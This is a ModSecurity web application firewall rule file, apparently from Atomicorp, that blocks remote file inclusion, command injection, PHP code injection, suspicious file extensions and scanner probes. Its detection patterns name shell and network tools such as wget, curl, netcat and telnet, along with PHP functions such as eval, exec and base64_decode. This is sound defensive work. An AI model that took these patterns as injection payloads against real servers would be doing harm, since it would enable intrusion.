!ARGS:Query|!ARGS:steps|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:/^wimpy/|!ARGS:/_ref/|!ARGS:/^pr_/|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^rsargs/|!ARGS:op|!ARGS:ret|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:area|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:st_widget|!ARGS:def|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:Store_OUI_GlobalFooter|!ARGS:map|!ARGS:/^dynafield/|!ARGS:wysiwyg|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:code|!ARGS:/^k2extra/|!ARGS:github|!ARGS:linkedin|!ARGS:stack_overflow  "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)://(.*)$"  "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:lowercase,multimatch,id:340163,rev:308,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection Attack Blocked (Unauthorized URL detected as argument)',chain"
SecRule TX:1 "!@beginsWith %{request_headers.host}" "t:none,t:lowercase"
#SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"

SecMarker END_INJECTION_RULES_MULTI


#Remote command protection rules
SecRule REQUEST_URI|ARGS|!ARGS:fileContent|!ARGS:/msg/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/body/|!ARGS:/message/|!ARGS:/text/|!ARGS:templatecode|!ARGS:areas|!ARGS:/illegalusernames/|!ARGS:/image/|!ARGS:resolution|!ARGS:depth|!ARGS:/email/|!ARGS:/comment/|!ARGS:mailbox|!ARGS:/descr/|!ARGS:/resolution/|!ARGS:/solution/|!ARGS:/txt/|!ARGS:body|!ARGS:/message/|!ARGS:/content/|!ARGS:/password/|!ARGS:FoxyData|!ARGS:/jform/|!ARGS:areas|!ARGS:templatecode|!ARGS:site_first|!ARGS:sendDescription|!ARGS:templatecode|!ARGS:areas|!ARGS:wpSummary|!ARGS:/keyword/ "@pm cd perl killall python rpm yum apt-get emerge lynx links mkdir elinks pwd wget ftpget lwp- id uname cvs svn rcp scp ssh rsh sftp netstat netcat rexec smbclient ftp curl telnet cc g++ whoami kill rm rsync nasm cmd command git" "phase:2,id:334820,t:none,t:urlDecodeUni,t:cmdline,pass,nolog,noauditlog,skip:1"
#        SecAction phase:2,id:354372,t:none,pass,nolog,noauditlog,skipAfter:END_CMD2_ATTACKS
# Rule 340023: Generic remote comand attack signature
SecRule REQUEST_URI|ARGS|!ARGS:fileContent|!ARGS:/disallowed/|!ARGS:/msg/|!ARGS:post|!ARGS:/sql/|!ARGS:prefix|!ARGS:/body/|!ARGS:/search/|!ARGS:/message/|!ARGS:/text/|!ARGS:templatecode|!ARGS:areas|!ARGS:/illegalusernames/|!ARGS:/image/|!ARGS:resolution|!ARGS:depth|!ARGS:/email/|!ARGS:/comment/|!ARGS:mailbox|!ARGS:/descr/|!ARGS:/resolution/|!ARGS:/solution/|!ARGS:/txt/|!ARGS:body|!ARGS:/message/|!ARGS:/content/|!ARGS:/password/|!ARGS:FoxyData|!ARGS:/jform/|!ARGS:areas|!ARGS:templatecode|!ARGS:site_first|!ARGS:sendDescription|!ARGS:templatecode|!ARGS:areas|!ARGS:wpSummary|!ARGS:/keyword/ "(?:\b(?:cd|perl|killall|traceroute|python|r(?:pm|sync)|yum|apt-get|emerge|lynx|links|mkdir|elinks|cmd|pwd|(?:w|ftp)get|lwp-(?:download|request|mirror|rget)|id|uname|cvs|svn|(?:s|r)(?:cp|sh)|n(?:et(?:stat|cat)|asm)|rexec|smbclient|t?ftp|ncftp|curl|telnet|g(?:cc|it)|cc|g\+\+|whoami)\b |\brm\b \-[a-z] |\bcat\b /|\bc(?:ommand|md)\.(?:exe|com)\b ?(?:/.*)?/[ck] )"  "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:cmdline,multimatch,capture,id:340023,rev:7,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  remote command execution',logdata:'%{TX.0}'"

SecMarker END_CMD2_ATTACKS

SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/*|!ARGS:jql|!ARGS:/^jform/|!ARGS:ausgabe|!ARGS:before_head|!ARGS:/jql/|!ARGS:img_title_format|!ARGS:headcode|!ARGS:/prod_/|!ARGS:/custom-js/|!ARGS:code|!ARGS:jqanote|!ARGS:/html/|!ARGS:/footer/|!ARGS:/message/|!ARGS:/header/|!ARGS:/scripttag/|!ARGS:input_10|!ARGS:/^tb/|!ARGS:param.code|!ARGS:templatecode|!ARGS:teaser_js|!ARGS:/^rsargs/|!ARGS:areas|!ARGS:/note/|!ARGS:printinfo|!ARGS:announcement|!ARGS:/content/|!ARGS:/wysiwyg/|!ARGS:pages|!ARGS:html|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:server_validation|!ARGS:/^data/|!ARGS:tv2|!ARGS:snippet|!ARGS:ausgabe|!ARGS:response|!ARGS:cs_preview_state|!ARGS:/editfile/|!ARGS:yaml|!ARGS:sqzr|!ARGS:/^_popupally/|!ARGS:SAMLResponse|!ARGS:/ARGS:/field_id/|!ARGS:codetocheck|!ARGS:/shortcode/|!ARGS:wpSummary|!ARGS:source|!ARGS:Form|!ARGS:/comment/|!ARGS:/field_image/|!ARGS:myDevEditControl_html|!ARGS:/details/|!ARGS:UserData|!ARGS:problem|!ARGS:resolution|!ARGS:subject|!ARGS:/body/|!ARGS:/^widget-section/|!ARGS:/template/|!ARGS:/^eip_/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/keyword/|!ARGS:/msg/|!ARGS:metadata|!ARGS:parent_name|!ARGS:topic|!ARGS:/^serendipity/|!ARGS:comment|!ARGS:summary|!ARGS:configoptionname|!ARGS:Definition|!ARGS:/php/|!ARGS:/Metatags/|!ARGS:/layout/|!ARGS:/message/|!ARGS:email|!ARGS:/^acf/|!ARGS:/desc/|!ARGS:body|!ARGS:/text/|!ARGS:/txt/|!ARGS:properties|!ARGS:params.code|!ARGS:php|!ARGS:code|!ARGS:/database/|!ARGS:SAMLResponse|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:templatecode|!ARGS:areas|!ARGS:comment|!ARGS:/kaliforms/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:definition "@rx (?i)\b(?:i(?:s(?:_(?:in(?:t(?:eger)?|finite)|n(?:u(?:meric|ll)|an)|(?:calla|dou)ble|s(?:calar|tring)|f(?:inite|loat)|re(?:source|al)|l(?:ink|ong)|a(?:rray)?|object|bool)|set)|n(?:(?:clud|vok)e|t(?:div|val))|(?:mplod|dat)e|conv)|s(?:t(?:r(?:(?:le|sp)n|coll)|at)|(?:e(?:rializ|ttyp)|huffl)e|i(?:milar_text|zeof|nh?)|p(?:liti?|rintf)|(?:candi|ubst)r|y(?:mlink|slog)|o(?:undex|rt)|leep|rand|qrt)|f(?:ile(?:(?:siz|typ)e|owner|pro)|l(?:o(?:atval|ck|or)|ush)|(?:rea|mo)d|t(?:ell|ok)|unction|close|gets|stat|eof)|c(?:h(?:o(?:wn|p)|eckdate|root|dir|mod)|o(?:(?:(?:nsta|u)n|mpac)t|sh?|py)|lose(?:dir|log)|(?:urren|ryp)t|eil)|e(?:x(?:(?:trac|i)t|p(?:lode)?)|a(?:ster_da(?:te|ys)|ch)|r(?:ror_log|egi?)|mpty|cho|nd)|l(?:o(?:g(?:1[0p])?|caltime)|i(?:nk(?:info)?|st)|(?:cfirs|sta)t|evenshtein|trim)|d(?:i(?:(?:skfreespac)?e|r(?:name)?)|e(?:fined?|coct)|(?:oubleva)?l|ate)|r(?:e(?:(?:quir|cod|nam)e|adlin[ek]|wind|set)|an(?:ge|d)|ound|sort|trim)|m(?:b(?:split|ereg)|i(?:crotime|n)|a(?:i[ln]|x)|etaphone|y?sql|hash)|u(?:n(?:(?:tain|se)t|iqid|link)|s(?:leep|ort)|cfirst|mask)|a(?:s(?:(?:se|o)rt|inh?)|r(?:sort|ray)|tan[2h]?|cosh?|bs)|t(?:e(?:xtdomain|mpnam)|a(?:int|nh?)|ouch|ime|rim)|h(?:e(?:ader(?:s_(?:lis|sen)t)?|brev)|ypot|ash)|p(?:a(?:thinfo|ck)|r(?:intf?|ev)|close|o[sw]|i)|g(?:et(?:t(?:ext|ype)|date)|mdate)|o(?:penlog|ctdec|rd)|b(?:asename|indec)|n(?:atsor|ex)t|k(?:sort|ey)|quotemeta|wordwrap|virtual|join)(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:removeComments,t:compressWhiteSpace,t:lowercase,msg:'Atomicorp.com WAF Rules: PHP payload detected',id:380026,rev:24,logdata:'%{TX.0}',severity:'2',tag:'SQLi',tag:'RCE'"

############ PHP URL ATTACKS ####################
#
#PHP applications
SecRule REQUEST_FILENAME "\.php" "phase:2,id:333820,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
        SecAction "phase:2,id:334372,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_GENERIC_ATTACKS"

# Rule 340117: General [url] php forum protections (phpbb and others, to protect against script injection attacks in url links)
SecRule REQUEST_URI|ARGS|!ARGS:templatecode|!ARGS:areas "\[url ?= ?(?:script|javascript|applet|about|chrome|activex|qx?ss|embed):/.*\].*\[ ?/ ?url ?\]"  "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:340117,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: General [url] php forum protections'"

# Rule 340039: generic php attack sigs
SecRule REQUEST_FILENAME "!(/mod_cmd/index\.php)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,chain,id:340039,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHP command injection attempt'"
SecRule REQUEST_URI "(?:&(?:cmd|command)=(?:id|uname) |cmd\?(?:cmd|command)=|(?:spy|cmd|cmd_out|sh)\.(?:gif|jpg|png|bmp|txt)\?&(?:cmd|command)=|\.php\?&(?:cmd|command)=)"

# Rule 340137: Generic PHP avatar upload exploits
#SecRule REQUEST_BODY "content-disposition\: form-data\; name=\"avatar\"\;" 	"phase:2,deny,status:403,t:none,t:lowercase,t:compressWhitespace,phase:2,id:340137,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHPBB avatar exploit',chain"
#SecRule REQUEST_BODY "\<\? ?php" chain
#SecRule REQUEST_BODY "\? ?>"
#
# Rule 340021: PHP Injection Attack generic signature
#SecRule REQUEST_URI|ARGS|!ARGS:templatecode|!ARGS:areas|!ARGS:/description/|!ARGS:/resolution/|!ARGS:/problem/ "(?:\?(?:(?:local|include|pear|squizlib)_path|action|content|dir|name|menu|pm_path|pathtoroot|cat|pagina|path|include_location|root|page|gorumdir|site|topside|pun_root|open|seite)=(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|(?:cmd|command)=(?:cd|\;|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |lwp-(?:download|request|mirror|rget) |uname|cvs |svn |(?:s|r)(?:cp|sh) |net(?:stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./|whoami|killall |rm \-[a-z]))"  	"phase:2,deny,status:403,t:none,t:lowercase,t:replaceNulls,t:compressWhitespace,t:normalisePath,id:340021,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: PHP Injection Attack 1'"
#SecRule REQUEST_URI  "!(/lightboxjs\.php\?path=http:/)"  "t:none,t:lowercase"


# Rule 340022: PHP Injection Attack generic signature
#SecRule REQUEST_URI  "\.php\?(?:(?:(?:local|include|pear|squizlib)_path|action|content|dir|name|menu|pm_path|pagina|path|pathtoroot|cat|include_location|gorumDir|root|page|site|topside|pun_root|open|seite)=(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|.*(?:cmd|command)=(?:cd|\;|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(?:download|request|mirror|rget) |id|uname |cvs |svn |(?:s|r)(?:cp|sh) |net(?:stat|cat)|rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z]))" 	"capture,chain,id:340022,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: PHP Injection Attack 2',logdata:'%{TX.0}'"
#SecRule REQUEST_URI "!(/lightboxjs\.php\?path=http://)"


SecMarker END_PHP_GENERIC_ATTACKS


############## BAD FILE NAMES #########################
#ZenPhoto uses weird extensions when its using mod_rewite
#zp_user_auth

SecRule REQUEST_URI "@pm .gif.txt .gif.dat .jpeg.txt .jpeg.dat .jpg.txt .jpg.dat .png.txt .png.dat .bmp.txt .bmp.dat .php.jpg .php.jpeg .php.flv .php.gif .php.mp3 .php.mp4 .php.mpg .php.mpeg .php.png .php.bmp .php.tif .php.txt .php.dat .php.avi .php.wmv .php.mp3" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,id:340035,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Bogus file extensions'"

SecRule REQUEST_FILENAME "@pm .jpg.php .gif.php .png.php .jsp;gif .jsp;jpg .jsp;png" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,id:341137,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Potentially Bogus PHP file'"

#SecMarker END_BAD_FILE_NAMES

############# GENERIC COMMAND ATTACK SIGS ##############
#SecRule REQUEST_URI "@pm perl ; ' | nc telnet sh exec ogg gopher http ftp lynx wget links curl ogg:// tls://  gopher:// cp @ rsync ftp cvs svn traceroute"         "phase:2,pass,nolog,noauditlog,skip:1"
#SecAction phase:2,pass,nolog,noauditlog,skipAfter:END_CMD_INJECTION_2
#
# Rule 340037: generic attack sig
#SecRule REQUEST_URI "(?:cd |\;|php |echo |perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |wget |lwp-(?:download|request|mirror|rget) |id|uname |cvs |svn |(?:s|r)(?:cp|sh) |net(?:stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |g?cc |cpp |g\+\+ |/bin/(xterm|id|bash|sh|echo|kill|chmod|ch?sh|python|perl|nasm|ping|mail))" 	"id:340037,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Generic command injection'"

# Rule 3400XX: Generic argument protection rule against bad meta characters
#SecRule "ARGS" "!^[a-z0-9.&/?@_%=:;, -]+$"

# Rule 340059: traceroute command attempt
#SecRule REQUEST_URI  "traceroute" 	"chain,id:340059,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Command attempt (traceroute)'"
#SecRule REQUEST_URI " (?:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)"

# Rule 340083: very experimental generic remote download sig
# These are VERY experiemental, please report false positives/negatives, etc.
# foo IP or FQDN, or foo http/https/ftp://whatever
#SecRule REQUEST_URI "(?:(?:perl|t?ftp|links|elinks|lynx|ncftp|(?:s|r)(?:cp|sh)|wget|lwp-(?:download|request|mirror|rget)|curl|cvs|svn).* (?:(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|.*[a-z|0-9]\.[a-z]{2,4}/|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)|traceroute  (?:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)"  	"id:340083,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic Command attempt'"

# Rule 340084: Command inline detection
#SecRule REQUEST_URI "(?: |\;|/|\'|,|\&|\=|\.)(?:(?:s|r)(?:sh|cp)) *(?:.*\@.*|(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|.*[a-z|0-9]\.[a-z]{2,4}/|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)"  	"chain,id:340084,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Command injection attempt'"
#SecRule  REQUEST_URI "!(?:/scp/tickets\.php|/cgi-bin/stats\.cgi)"

# Rule 340085: very experimental connect command sig
#SecRule REQUEST_URI "(?:(?:(?: |\;|/|\'|,|\&|\=|\.)(?:perl|nc|telnet|(?:r|s)sh|rexec) .*(?:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|[a-z|0-9]\.[a-z]{2,4}|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)|\;perl [a-z|0-9]+;|(?:lynx|curl|wget|links) -dump |links (?:-(?:dump-(?:charset|width)|source)|(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/))|(?: |\;|/|\'|,|\&|\=|\.)(?:(?:s|r)(?:sh|cp)) *(?:.*\@.*|(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|.*[a-z|0-9]\.[a-z]{2,4}/|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)|(?:(?:perl|t?ftp|links|elinks|lynx|ncftp|(?:s|r)(?:cp|sh)|wget|lwp-(?:download|request|mirror|rget)|curl|cvs|svn).* (?:(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|.*[a-z|0-9]\.[a-z]{2,4}/|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)|traceroute  (?:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+))" 	"capture,id:340085,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Command injection attempt',logdata:'%{TX.0}'"

#SecMarker END_CMD_INJECTION_2

########### SCANNER SIGS #######################
SecRule REQUEST_URI "@pm nessus w00tw00t hacked" "phase:2,id:333823,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:334374,t:none,pass,nolog,noauditlog,skipAfter:END_SCANNER_SIGS"

# Rule 340069:  nessus 1.X 404 probe
SecRule REQUEST_URI "(?:nessus(?:_is_probing_you_|test)|^/w00tw00t\.at\.)"  "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:340069,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Web vulnerability scanner'"

# Rule 340150:  Dfind signature
# w00tw00t.at.ISC.SANS.DFind
# not likely to catch this, as it usually happens via an invalid
# HTTP/1.1 request without a hostname, which apache will reject therefore other rules
# WEB_ERROR_LOG will catch this
#SecRule REQUEST_URI  "w00tw00t" 	"phase:1,deny,status:403,t:none,t:lowercase,id:340150,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: DFind scanner attempt'"

# Rule 340141: wormsign
#SecRule REQUEST_URI "hacked ?by ?member ?of" 	"id:340141,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: worm'"

SecMarker END_SCANNER_SIGS
################ PHP DEFENSES ########################
#
#SecRule ARGS:PHPSESSID ";www"         "phase:2,pass,nolog,noauditlog,skip:1"
#SecAction phase:2,pass,nolog,noauditlog,skipAfter:END_PHP_PROT_1
#
#types that do not have RFI at all
SecRule TX:STATIC "@eq 1" "phase:2,id:'334819',pass,t:none,nolog,noauditlog,skipAfter:END_PHP_PROT_1"

#additional types
SecRule TX:NONPHP "@eq 1" "phase:2,id:'333824',pass,t:none,nolog,noauditlog,skipAfter:END_PHP_PROT_1"
#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|js|css|ico|avi|flv|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk|(?:ht|x)ml)$" phase:2,id:333824,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_PHP_PROT_1


# Rule 340076: PHP defenses
SecRule ARGS:PHPSESSID "(?:!^[0-9a-z]*$|!^[0-9a-z]*;www)"  "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:340076,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: PHP Session attack'"


# Rule 340079: PHP defenses
SecRule REQUEST_COOKIES:sessionid "![0-9a-z]*$" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,id:340079,rev:10,severity:2,msg:'Atomicorp.com WAF Rules: PHP policy violation'"

SecMarker END_PHP_PROT_1

############# APACHE PROTECTIONS #####################
SecRule REQUEST_URI "@pm server-info server-status cwd= jsp desudesudesu" "id:333825,t:none,t:urlDecodeUni,phase:2,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:334375,t:none,pass,nolog,noauditlog,skipAfter:END_APACHE_PROT"

# Rule 340114: Apache /server-info accessible
SecRule REQUEST_URI   "^/server-(?:info|status)/?$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,chain,id:340114,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Apache admin service access attempt'"
SecRule REMOTE_ADDR "!@ipMatch 127.0.0.1,::1"  "t:none"

# Rule 340116: generic Common HTTP vulnerability
SecRule REQUEST_URI "(?:/\?cwd=/|a cat is fine too\.)" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compresswhitespace,id:340116,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Common HTTP vulnerability'"

# Rule 340097:   Tomcat view source attempt
SecRule REQUEST_URI "\x252ejsp" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,id:340097,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Tomcat view source attempt'"

SecMarker END_APACHE_PROT


################PHP CODE INJECTION ATTACKS ###################
#types that do not have RFI at all
SecRule TX:STATIC "@eq 1" "phase:2,id:'333826',pass,t:none,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_4"

#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|js|css|ico|avi|flv|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:333826,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_4
SecRule REQUEST_URI "^/eprocservice/supplierinboundservice" "phase:2,id:363828,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_4"

SecRule REQUEST_FILENAME "(?:\.(?:pl|aspx?|f?cgi|do|exe|s?html)$|/cgi-bin/)" "phase:2,id:333828,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_NOT_PERL"

SecRule REQUEST_URI|REQUEST_BODY|ARGS|REQUEST_HEADERS|ARGS_NAMES|XML:/*|!ARGS:templatecode|!ARGS:areas "@pm chr system passthru serialize include php_uname preg_ mysql_query exec eval create_function create_function phpinfo decode_base64 base64_decode base64_url_decode rot13" "phase:2,id:334827,t:none,t:replaceNulls,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
        SecAction "phase:2,id:334376,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_B64"

SecRule REQUEST_URI "(/wp-login\.php\?vaultpress=true|/site-content/|^/admin/editform)" "t:none,t:lowercase,phase:2,id:334857,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_B64"

SecRule REQUEST_URI|ARGS|!ARGS:templatecode|!ARGS:areas|!ARGS:/news/|!ARGS:rsargs|!ARGS:/note/|!ARGS:announcement|!ARGS:filedata|!ARGS:customizer|!ARGS:cs_preview_state|!ARGS:SAMLResponse|!ARGS:add_new|!ARGS:/content/|!ARGS:/wysiwyg/|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:/comment/|!ARGS:problem|!ARGS:resolution|!ARGS:subject|!ARGS:/body/|!ARGS:/^widget-section/|!ARGS:/template/|!ARGS:/^eip_/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/keyword/|!ARGS:/msg/|!ARGS:metadata|!ARGS:post_content|!ARGS:parent_name|!ARGS:topic|!ARGS:file_content|!ARGS:/^serendipity/|!ARGS:comment|!ARGS:summary|!ARGS:configoptionname|!ARGS:Definition|!ARGS:/php/|!ARGS:/Metatags/|!ARGS:/footerfile/|!ARGS:/layout/|!ARGS:/message/|!ARGS:email|!ARGS:/desc/|!ARGS:body|!ARGS:content "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|\b(?:passthru|serialize|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|include|eval|create_function|system|base64_decode|decode_base64|base64_url_decode|str_rot13)\b ?(?:\(|\:))" "phase:2,deny,log,auditlog,status:403,t:none,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:340195,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Base64 Encoded PHP function in Argument - this may be an attack.',logdata:'%{TX.0}'"

SecMarker END_PHP_CODE_INJECTION_ATTACKS_B64

#non B64 rules
SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|ARGS_NAMES|XML:/*|!ARGS:/template/|!ARGS:areas "@pm php chr fopen fwrite globals system passthru serialize include php_uname popen proc_open mysql_query exec eval create_function proc_nice proc_terminate proc_get_status proc_close pfsockopen leak apache_child_terminate posix_kill posix_mkfifo posix_setpgid posix_setsid posix_setuid phpinfo preg_ decode_base64 base64_decode base64_url_decode rot13 <? mfunc mclude dynamic-cached-content md5 die sha" "phase:2,id:333827,t:none,t:urlDecodeUni,t:removeComments,pass,nolog,noauditlog,skip:1"
        SecAction "phase:2,id:334377,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_1"

SecRule REQUEST_URI "(?:/wp-login\.php\?vaultpress=true|/site-content/|^/admin/editform|^/admin/cms/pages/(?:edit|add)|^/admin\.php\?templates/save|^/node/[0-9]+/(?:add|edit)|^/wp-admin/options-general\.php\?page=googlepublisherplugin)" "t:none,t:lowercase,phase:2,id:364358,pass,nolog,noauditlog,skipAfter:END_RULE_340095"

SecRule ARGS|!ARGS:param.code|!ARGS:templatecode|!ARGS:teaser_js|!ARGS:/^rsargs/|!ARGS:areas|!ARGS:/note/|!ARGS:printinfo|!ARGS:announcement|!ARGS:/content/|!ARGS:/wysiwyg/|!ARGS:pages|!ARGS:html|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:server_validation|!ARGS:/^data/|!ARGS:tv2|!ARGS:snippet|!ARGS:ausgabe|!ARGS:cs_preview_state|!ARGS:/editfile/|!ARGS:yaml|!ARGS:sqzr|!ARGS:/^_popupally/|!ARGS:SAMLResponse|!ARGS:/ARGS:/field_id/|!ARGS:codetocheck|!ARGS:/shortcode/|!ARGS:wpSummary|!ARGS:source|!ARGS:Form|!ARGS:/comment/|!ARGS:/field_image/|!ARGS:myDevEditControl_html|!ARGS:/details/|!ARGS:UserData|!ARGS:problem|!ARGS:resolution|!ARGS:subject|!ARGS:/body/|!ARGS:/^widget-section/|!ARGS:/template/|!ARGS:/^eip_/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/keyword/|!ARGS:/msg/|!ARGS:metadata|!ARGS:post_content|!ARGS:parent_name|!ARGS:topic|!ARGS:file_content|!ARGS:/^serendipity/|!ARGS:comment|!ARGS:summary|!ARGS:configoptionname|!ARGS:Definition|!ARGS:/php/|!ARGS:/Metatags/|!ARGS:/footerfile/|!ARGS:/layout/|!ARGS:/message/|!ARGS:email|!ARGS:/desc/|!ARGS:body|!ARGS:/text/|!ARGS:/txt/|!ARGS:content|!ARGS:params.code "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) 